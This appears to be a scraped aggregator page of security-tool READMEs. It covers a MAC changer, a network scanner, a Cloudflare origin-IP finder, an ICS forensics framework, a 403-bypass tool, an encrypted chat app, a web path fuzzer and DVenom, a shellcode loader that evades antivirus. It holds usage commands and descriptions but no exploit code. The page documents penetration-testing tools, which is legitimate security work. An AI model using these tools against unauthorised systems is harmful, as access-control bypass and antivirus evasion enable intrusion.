    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    ┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
    ┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
    β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
    β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
    β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
    β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.



    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

    Limitation

    infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
    - Still in the development phase, sometimes it can't detect the real Ip.

    - CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

    1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

    2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

    3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

    1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

    3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

    CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

    We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

    Black Hat Arsenal 2024 Next Stop Singapore !

    Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

    ICS-Forensics-Tools - Microsoft ICS Forensics Framework

    By: Zion3R


    Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
    it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
    open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.


    Getting Started

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    git clone https://github.com/microsoft/ics-forensics-tools.git

    Prerequisites

    Installing

    • Install python requirements

      pip install -r requirements.txt

    Usage

    General application arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    -s, --save-config Save config file for easy future usage Optional
    -c, --config Config file path, default is config.json Optional
    -o, --output-dir Directory in which to output any generated files, default is output Optional
    -v, --verbose Log output to a file as well as the console Optional
    -p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

    Specific plugin arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    --ip Addresses file path, CIDR or IP addresses csv (ip column required).
    add more columns for additional info about each ip (username, pass, etc...)
    Required
    --port Port number Optional
    --transport tcp/udp Optional
    --analyzer Analyzer name to run Optional

    Executing examples in the command line

     python driver.py -s -v PluginName --ip ips.csv
    python driver.py -s -v PluginName --analyzer AnalyzerName
    python driver.py -s -v -c config.json --multiprocess

    Import as library example

    from forensic.client.forensic_client import ForensicClient
    from forensic.interfaces.plugin import PluginConfig
    forensic = ForensicClient()
    plugin = PluginConfig.from_json({
    "name": "PluginName",
    "port": 123,
    "transport": "tcp",
    "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
    "parameters": {
    },
    "analyzers": []
    })
    forensic.scan([plugin])

    Architecture

    Adding Plugins

    When developing locally make sure to mark src folder as "Sources root"

    • Create new directory under plugins folder with your plugin name
    • Create new Python file with your plugin name
    • Use the following template to write your plugin and replace 'General' with your plugin name
    from pathlib import Path
    from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
    from forensic.common.constants.constants import Transport


    class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
    super().__init__(folder_name)
    self.name = "General"
    self.description = "General Plugin Description"
    self.port = 123
    self.transport = Transport.TCP

    def flags(self, parser):
    self.base_flags(parser, self.port, self.transport)
    parser.add_argument('--general', help='General additional argument', metavar="")


    class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
    super().__init__(config, output_dir, verbose)

    def connect(self, address):
    self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
    self.logger.info(f"{self.config.name} export")
    • Make sure to import your new plugin in the __init__.py file under the plugins folder
    • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
      there are 2 mandatory functions (connect, export).
      the connect function receives single ip address and extracts any relevant information from the device and return it.
      the export function receives the information that was extracted from all the devices and there you can export it to file.
    • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
      there is a single mandatory function (flags).
      In which you must call base_flags, and you can add any additional flags that you want to have.

    Adding Analyzers

    • Create new directory under analyzers folder with the plugin name that related to your analyzer.
    • Create new Python file with your analyzer name
    • Use the following template to write your plugin and replace 'General' with your plugin name
    from pathlib import Path
    from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


    class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
    super().__init__(config, output_dir, verbose)
    self.plugin_name = 'General'
    self.create_output_dir(self.plugin_name)

    def analyze(self):
    pass
    • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

    Resources and Technical data & solution:

    Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

    Section 52 under MSRC blog
    ICS Lecture given about the tool
    Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

    Contributing

    This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

    When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

    This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

    Trademarks

    This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



    Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

    By: Zion3R


    Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

    • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
    • Utilizes various methods and headers to test and bypass access controls.
    • Customizable through command-line arguments.

    Install requirements

    pip3 install -r requirements.txt

    Run the script

    python3 forbidden_buster.py -u http://example.com

    Forbidden Buster accepts the following arguments:

    fuzzing (stressful) --include-user-agent Include User-Agent fuzzing (stressful)" dir="auto">
      -h, --help            show this help message and exit
    -u URL, --url URL Full path to be used
    -m METHOD, --method METHOD
    Method to be used. Default is GET
    -H HEADER, --header HEADER
    Add a custom header
    -d DATA, --data DATA Add data to requset body. JSON is supported with escaping
    -p PROXY, --proxy PROXY
    Use Proxy
    --rate-limit RATE_LIMIT
    Rate limit (calls per second)
    --include-unicode Include Unicode fuzzing (stressful)
    --include-user-agent Include User-Agent fuzzing (stressful)

    Example Usage:

    python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

    • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
    • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
    • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


    CryptoChat - Beyond Secure Messaging

    By: Zion3R


    Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

    1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
    2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
    3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
    4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
    5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
    6. Group Chats: Have encrypted conversations with multiple people at once.

    • Python 3.x
    • cryptography
    • colorama

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/CryptoChat.git
    2. Navigate to the project directory:

      cd CryptoChat
    3. Install the required dependencies:

      pip install -r requirements.txt

    bind the server to. --port PORT The port number to bind the server to. -------------------------------------------------------------------------- $ python3 client.py --help usage: client.py [-h] [--host HOST] [--port PORT] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The server's IP address. --port PORT The port number of the server." dir="auto">
    $ python3 server.py --help
    usage: server.py [-h] [--host HOST] [--port PORT]

    Start the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to.
    --port PORT The port number to bind the server to.
    --------------------------------------------------------------------------
    $ python3 client.py --help
    usage: client.py [-h] [--host HOST] [--port PORT]

    Connect to the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The server's IP address.
    --port PORT The port number of the server.

    secret key for encryption. (Default=mysecretpassword) -------------------------------------------------------------------------- $ python3 clientE.py --help usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The IP address to bind the server to. (Default=127.0.0.1) --port PORT The port number to bind the server to. (Default=12345) --key KEY The secret key for encryption. (Default=mysecretpassword)" dir="auto">
    $ python3 serverE.py --help
    usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]

    Start the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to. (Default=0.0.0.0)
    --port PORT The port number to bind the server to. (Default=12345)
    --key KEY The secret key for encryption. (Default=mysecretpassword)
    --------------------------------------------------------------------------
    $ python3 clientE.py --help
    usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]

    Connect to the chat server.

    options:
    -h, --help show this help message and exit
    --host HOST The IP address to bind the server to. (Default=127.0.0.1)
    --port PORT The port number to bind the server to. (Default=12345)
    --key KEY The secret key for encr yption. (Default=mysecretpassword)
    • --help: show this help message and exit
    • --host: The IP address to bind the server.
    • --port: The port number to bind the server.
    • --key : The secret key for encryption

    Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

    If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:



    Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

    By: Zion3R

    Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

    Afuzz is being actively developed by @rapiddns


    Features

    • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
    • Uses blacklist to filter invalid pages
    • Uses whitelist to find content that bug bounty hunters are interested in in the page
    • filters random content in the page
    • judges 404 error pages in multiple ways
    • perform statistical analysis on the results after scanning to obtain the final result.
    • support HTTP2

    Installation

    git clone https://github.com/rapiddns/Afuzz.git
    cd Afuzz
    python setup.py install

    OR

    pip install afuzz

    Run

    afuzz -u http://testphp.vulnweb.com -t 30

    Result

    Table

    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | http://testphp.vulnweb.com/ |
    +-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
    | target | path | status | redirect | title | length | content-type | lines | words | type | mark |
    +-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
    | http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
    | http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
    | http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
    | http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
    | http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
    | http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
    | http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
    | http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
    | http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
    | http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
    | http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
    | http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
    +-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

    Json

    {
    "result": [
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/workspace.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 12437,
    "content_type": "text/xml",
    "lines": 217,
    "words": 774,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/workspace.xml"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "admin",
    "status": 301,
    "redirect": "http://testphp.vulnweb.com/admin/",
    "title": "301 Moved Permanently",
    "length": 169,
    "content_type": "text/html",
    "lines": 8,
    "words ": 11,
    "type": "folder",
    "mark": "30x",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/admin"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "login.php",
    "status": 200,
    "redirect": "",
    "title": "login page",
    "length": 5009,
    "content_type": "text/html",
    "lines": 120,
    "words": 432,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/login.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/.name",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 6,
    "content_type": "application/octet-stream",
    "lines": 1,
    "words": 1,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/.name"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/vcs.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 173,
    "content_type": "text/xml",
    "lines": 8,
    "words": 13,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/vcs.xml"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/",
    "status": 200,
    "redirect": "",
    "title": "Index of /.idea/",
    "length": 937,
    "content_type": "text/html",
    "lines": 14,
    "words": 46,
    "type": "whitelist",
    "mark": "index of",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "cgi-bin/",
    "status": 403,
    "redirect": "",
    "title": "403 Forbidden",
    "length": 276,
    "content_type": "text/html",
    "lines": 10,
    "words": 28,
    "type": "folder",
    "mark": "403",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/cgi-bin/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea/encodings.xml",
    "status": 200,
    "redirect": "",
    "title": "",
    "length": 171,
    "content_type": "text/xml",
    "lines": 6,
    "words": 11,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea/encodings.xml"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "search.php",
    "status": 200,
    "redirect": "",
    "title": "search",
    "length": 4218,
    "content_type": "text/html",
    "lines": 104,
    "words": 364,
    "t ype": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/search.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "product.php",
    "status": 200,
    "redirect": "",
    "title": "picture details",
    "length": 4576,
    "content_type": "text/html",
    "lines": 111,
    "words": 377,
    "type": "check",
    "mark": "",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/product.php"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": "admin/",
    "status": 200,
    "redirect": "",
    "title": "Index of /admin/",
    "length": 248,
    "content_type": "text/html",
    "lines": 8,
    "words": 16,
    "type": "whitelist",
    "mark": "index of",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/admin/"
    },
    {
    "target": "http://testphp.vulnweb.com/",
    "path": ".idea",
    "status": 301,
    "redirect": "http://testphp.vulnweb.com/.idea/",
    "title": "301 Moved Permanently",
    "length": 169,
    "content_type": "text/html",
    "lines": 8,
    "words": 11,
    "type": "folder",
    "mark": "30x",
    "subdomain": "testphp.vulnweb.com",
    "depth": 0,
    "url": "http://testphp.vulnweb.com/.idea"
    }
    ],
    "total": 12,
    "targe t": "http://testphp.vulnweb.com/"
    }

    Wordlists (IMPORTANT)

    Summary:

    • Wordlist is a text file, each line is a path.
    • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
    • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

    Examples:

    • Normal extensions
    index.%EXT%

    Passing asp and aspx extensions will generate the following dictionary:

    index
    index.asp
    index.aspx
    • host
    %subdomain%.%ext%
    %sub%.bak
    %domain%.zip
    %rootdomain%.zip

    Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

    test-www.hackerone.com.php
    test-www.zip
    test.zip
    www.zip
    testwww.zip
    hackerone.zip
    hackerone.com.zip

    Options

        #     ###### ### ###  ######  ######
    # # # # # # # # #
    # # # # # # # # # #
    # # ### # # # #
    # # # # # # # #
    ##### # # # # # # #
    # # # # # # # # #
    ### ### ### ### ###### ######



    usage: afuzz [options]

    An Automated Web Path Fuzzing Tool.
    By RapidDNS (https://rapiddns.io)

    options:
    -h, --help show this help message and exit
    -u URL, --url URL Target URL
    -o OUTPUT, --output OUTPUT
    Output file
    -e EXTENSIONS, --extensions EXTENSIONS
    Extension list separated by commas (Example: php,aspx,jsp)
    -t THREAD, --thread THREAD
    Number of threads
    -d DEPTH, --depth DEPTH
    Maximum recursion depth
    -w WORDLIST, --wordlist WORDLIST
    wordlist
    -f, --fullpath fullpath
    -p PROXY, --proxy PROXY
    proxy, (ex:http://127.0.0.1:8080)

    How to use

    Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

    Simple usage

    afuzz -u https://target
    afuzz -e php,html,js,json -u https://target
    afuzz -e php,html,js -u https://target -d 3

    Threads

    The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

    In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

    afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

    Blacklist

    The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

    The blacklist.txt file is the same as dirsearch.

    The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

    Language detection

    The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

    References

    Thanks to open source projects for inspiration

    • Dirsearch by by Shubham Sharma
    • wfuzz by Xavi Mendez
    • arjun by Somdev Sangwan


    Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

    By: Zion3R


    Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

    • Capable of bypassing some well-known antivirus (AVs).
    • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
    • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
    • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    • Golang installed.
    • Basic understanding of shellcode operations.
    • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

    To clone and run this application, you'll need Git installed on your computer. From your command line:

    # Clone this repository
    $ git clone https://github.com/zerx0r/dvenom
    # Go into the repository
    $ cd dvenom
    # Build the application
    $ go build /cmd/dvenom/

    After installation, you can run the tool using the following command:

    ./dvenom -h

    • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
